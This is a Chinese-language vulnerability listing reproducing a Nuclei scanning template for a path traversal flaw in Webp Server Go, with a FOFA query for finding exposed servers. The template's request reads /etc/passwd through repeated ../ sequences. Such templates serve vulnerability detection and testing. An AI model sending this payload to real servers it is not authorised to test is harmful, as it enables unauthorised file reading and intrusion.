webp-server-lfi: Webp Server Go - Path Traversal

日期: 2025-08-01 | 影响软件: Webp Server Go | POC: 已公开

漏洞描述

Webp Server Go has an Path Traversal vulnerability. Attackers can use the vulnerability to access arbitraty file.

PoC代码[已公开]

id: webp-server-lfi

info:
  name: Webp Server Go - Path Traversal
  author: ritikchaddha
  severity: high
  description: |
    Webp Server Go has an Path Traversal vulnerability. Attackers can use the vulnerability to access arbitraty file.
  reference:
    - https://github.com/webp-sh/webp_server_go/issues/92
  metadata:
    max-request: 1
    verified: true
    fofa-query: header="Webp-Server-Go"
  tags: webp,webp-server,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/../../../../../../../../../../../etc/passwd"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - 'contains(server, "Webp-Server-Go")'
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022100afccf9d5bc55474bd42ef2f08d0581d6b85598b6d745d1365af527b03c2d1f26022043004a7c4fbaff471915a8647db0cf0222f2f9706f2c1943d0e8b22ae33241ed:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/other/webp-server-lfi.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐